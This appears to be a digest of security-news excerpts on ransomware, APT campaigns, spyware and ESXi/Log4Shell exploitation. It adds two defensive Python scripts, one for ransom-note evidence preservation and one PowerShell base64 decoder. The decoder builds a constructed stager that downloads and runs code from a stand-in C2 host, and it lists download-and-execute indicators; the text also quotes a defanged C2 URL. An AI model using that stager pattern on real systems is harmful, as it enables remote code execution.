
A ransomware attack took 100 Romanian hospitals down

Security Affairs

Identify affected systems and immediately isolate them from the rest of the network as well as from the Internet. Keep a copy of the ransom message and any other communications from the attackers; this information is useful to the authorities and for further analysis of the attack. Do not shut down the affected equipment (powering it off destroys volatile evidence such as memory contents and active network connections).
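The "keep a copy of the ransom message" step is easy to get wrong under pressure: responders open, edit or move the note and lose its timestamps. The script below is an added illustration of doing it defensibly; it is not code from the Security Affairs article or from the Romanian authorities, and the evidence directory layout, the JSONL manifest and the fake note text are this example's own assumptions. It copies each attacker artefact without touching the original, preserves timestamps, re-hashes the copy to prove it is identical, makes it read-only and records where and when it was collected.

```python
"""Preserve attacker communications as evidence without touching the originals.

Added illustration of the "keep a copy of the ransom message" step; this is
not code from the Security Affairs article or from the Romanian authorities.
File names, the evidence directory layout and the JSONL manifest are this
example's own assumptions.
"""
from __future__ import annotations

import hashlib
import json
import shutil
import stat
import tempfile
import time
from pathlib import Path


def sha256_file(path) -> str:
    """SHA-256 of a file, read in 1 MiB chunks so large artefacts need not fit in memory."""
    h = hashlib.sha256()
    with Path(path).open("rb") as f:
        for chunk in iter(lambda: f.read(1 << 20), b""):
            h.update(chunk)
    return h.hexdigest()


def _utc(ts: float | None = None) -> str:
    return time.strftime("%Y-%m-%dT%H:%M:%SZ", time.gmtime(ts))


def preserve_artifact(src: Path, evidence_dir: Path, note: str = "") -> dict:
    """Copy one attacker artefact (ransom note, e-mail, chat export) into evidence_dir.

    The original is only ever read; the copy keeps the original timestamps,
    is re-hashed to prove it is identical, is made read-only, and is logged
    in an append-only manifest together with where and when it was collected.
    """
    evidence_dir.mkdir(parents=True, exist_ok=True)
    st = src.stat()
    digest = sha256_file(src)
    dest = evidence_dir / f"{digest[:16]}_{src.name}"
    shutil.copy2(src, dest)               # copy2 preserves mtime/atime
    if sha256_file(dest) != digest:
        raise RuntimeError(f"copy of {src} does not match the original's hash")
    dest.chmod(stat.S_IRUSR)              # owner read-only: guards against accidental edits
    record = {
        "original_path": str(src.resolve()),
        "evidence_copy": str(dest),
        "sha256": digest,
        "size": st.st_size,
        "mtime_utc": _utc(st.st_mtime),
        "collected_utc": _utc(),
        "note": note,
    }
    with (evidence_dir / "manifest.jsonl").open("a", encoding="utf-8") as f:
        f.write(json.dumps(record) + "\n")
    return record


def load_manifest(evidence_dir: Path) -> list[dict]:
    """Read the manifest back, one JSON record per line."""
    manifest = evidence_dir / "manifest.jsonl"
    if not manifest.exists():
        return []
    return [json.loads(line) for line in manifest.read_text(encoding="utf-8").splitlines() if line]


def verify_manifest(evidence_dir: Path) -> bool:
    """Re-hash every evidence copy; True only if all still match what was recorded."""
    records = load_manifest(evidence_dir)
    return bool(records) and all(sha256_file(r["evidence_copy"]) == r["sha256"] for r in records)


def demo() -> tuple[dict, bool]:
    """Constructed demonstration: a fake ransom note in a temporary directory."""
    work = Path(tempfile.mkdtemp(prefix="ir-"))
    fake_note = work / "README_FOR_DECRYPT.txt"   # constructed sample, not a real ransom note
    fake_note.write_text("Your files are encrypted. Contact us at ...\n", encoding="utf-8")
    record = preserve_artifact(fake_note, work / "evidence", note="ransom note found on file server")
    return record, verify_manifest(work / "evidence")


if __name__ == "__main__":
    rec, ok = demo()
    print(json.dumps(rec, indent=2))
    print("manifest verified:", ok)
```

In a real engagement the evidence directory would sit on removable or remote storage, not on the compromised host, and the manifest hash list is what you hand to the authorities alongside the copies.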


Iran-linked APT35 group exploits Log4Shell flaw to deploy a new PowerShell backdoor

Security Affairs

The class runs a PowerShell command with a base64-encoded payload that handles communications with the C2 server and eventually receives and executes additional payloads. The additional modules sent by the C2 are: Applications, Screenshot, Process, System information, Command Execution, and Cleanup.
amazonaws[.]com/doclibrarysales/3
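A PowerShell stage that carries its real logic base64-encoded, as described above, is invisible to a string match on the raw command line but trivial to unwrap. The following detection example is added here and is not code from the article or from the researchers who analysed the backdoor; the process records, the two-layer script bodies and the host c2.example.invalid are constructed for the example. It decodes `-EncodedCommand` arguments (UTF-16LE) and any nested `[Convert]::FromBase64String("...")` literals, then scores the decoded text on common stager indicators.

```python
"""Decode base64-wrapped PowerShell from process-creation records.

Added detection example for the behaviour described above; it is not code
from the article or from the researchers who analysed the APT35 backdoor.
The process records, the script bodies and the host c2.example.invalid are
constructed for this example.
"""
from __future__ import annotations

import base64
import binascii
import re
import shlex

MAX_DEPTH = 5
# Inline [Convert]::FromBase64String("...") literals embedded in a script body.
INLINE_B64 = re.compile(r"FromBase64String\(\s*['\"]([A-Za-z0-9+/=]{16,})['\"]\s*\)", re.I)
# Strings that, together with decoded layers, are typical of loader/backdoor stagers.
INDICATORS = ("invoke-expression", "iex", "frombase64string", "downloadstring",
              "net.webclient", "invoke-webrequest", "-w hidden", "bypass")


def is_encoded_flag(tok: str) -> bool:
    """powershell.exe accepts any unique prefix of -EncodedCommand (-e, -ec, -enc, ...)."""
    if tok[:1] not in ("-", "/"):
        return False
    name = tok[1:].lower()
    return bool(name) and "encodedcommand".startswith(name)


def decode_b64(blob: str, utf16: bool) -> str | None:
    """Base64-decode and pick the text encoding: -EncodedCommand is always UTF-16LE."""
    try:
        raw = base64.b64decode(blob, validate=True)
    except (binascii.Error, ValueError):
        return None
    if utf16 or (len(raw) > 1 and raw[1:2] == b"\x00"):
        return raw.decode("utf-16-le", errors="replace")
    return raw.decode("utf-8", errors="replace")


def _tokens(text: str) -> list[str]:
    try:
        return shlex.split(text, posix=False)
    except ValueError:            # unbalanced quotes: fall back to a whitespace split
        return text.split()


def decode_layers(text: str, depth: int = 0) -> list[str]:
    """Return every decoded base64 layer found in text, outermost first, recursing into each."""
    if depth >= MAX_DEPTH:
        return []
    found: list[str] = []
    toks = _tokens(text)
    for i, tok in enumerate(toks[:-1]):
        if is_encoded_flag(tok):
            decoded = decode_b64(toks[i + 1].strip("'\""), utf16=True)
            if decoded:
                found.append(decoded)
    for m in INLINE_B64.finditer(text):
        decoded = decode_b64(m.group(1), utf16=False)
        if decoded:
            found.append(decoded)
    layers: list[str] = []
    for layer in found:
        layers.append(layer)
        layers.extend(decode_layers(layer, depth + 1))
    return layers


def analyse(cmdline: str) -> dict:
    """Decode all layers of a command line and score it on loader indicators."""
    layers = decode_layers(cmdline)
    text = "\n".join([cmdline, *layers]).lower()
    hits = [ind for ind in INDICATORS if ind in text]
    return {"layers": layers, "indicators": hits,
            "suspicious": bool(layers) and len(hits) >= 2}


def encode_ps(script: str) -> str:
    """Wrap a script the way -EncodedCommand expects it (UTF-16LE, then base64)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed two-layer stager (hypothetical C2 host), built here so the sample is exact.
INNER = 'IEX (New-Object Net.WebClient).DownloadString("http://c2.example.invalid/stage2")'
OUTER = ('$p=[Convert]::FromBase64String("' + base64.b64encode(INNER.encode()).decode("ascii")
         + '"); IEX ([Text.Encoding]::UTF8.GetString($p))')
SAMPLE_EVENTS = [   # constructed process-creation records, not real telemetry
    {"host": "ws01", "cmdline": "powershell.exe -NoProfile -Command Get-Process"},
    {"host": "ws02", "cmdline": f"powershell.exe -nop -w hidden -enc {encode_ps(OUTER)}"},
]


if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        result = analyse(ev["cmdline"])
        print(ev["host"], "suspicious" if result["suspicious"] else "benign", result["indicators"])
        for n, layer in enumerate(result["layers"], 1):
            print(f"  layer {n}: {layer}")
```

Requiring both a decoded layer and at least two indicators keeps ordinary administrative `-EncodedCommand` use (which is common in management tooling) from paging anyone; tune the indicator list to your environment rather than alerting on encoding alone.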



8220 Gang Cloud Botnet infected 30,000 hosts globally

Security Affairs

The 8220 group has been active since at least 2017. The threat actors are Chinese-speaking, and the group's name comes from port 8220, which the miner uses to communicate with its C2 servers. According to Microsoft researchers, the group has actively updated its techniques and payloads over the last year.


Red TIM Research found two rare flaws in Ericsson OSS-RC component

Security Affairs

Operations Support Systems (OSS) are the systems that communication service providers use to manage the integrated functions of their networks. The Operations Support System – Radio and Core (OSS-RC) provides a centralized interface into the radio and core components. Vulnerability description: Incomplete Cleanup.


Android Spyware Monokle, developed by Russian defense contractor, used in targeted attacks

Security Affairs

Record audio and calls; suicide functionality and cleanup of staging files. “Command and control infrastructure that communicates with the Defender application also communicates with Monokle samples. The signing certificates used for signing Android application packages overlap between Defender and Monokle as well.”


China-linked APT UNC3886 used VMware ESXi Zero-Day

Security Affairs

“Once the attackers opened a communication channel between guest and host, they were able to use new means of persistence to regain access to a backdoored ESXi host as long as a backdoor is deployed and the attacker gains initial access to any guest machine,” concludes the report.


China-linked APT group VANGUARD PANDA uses a new tradecraft in recent attacks

Security Affairs

In the most recent campaign, the group targeted organizations in the communications, manufacturing, utility, transportation, construction, maritime, government, information technology, and education sectors. The Volt Typhoon group, also tracked as VANGUARD PANDA, has been active since at least mid-2021 and has carried out cyber operations against critical infrastructure.
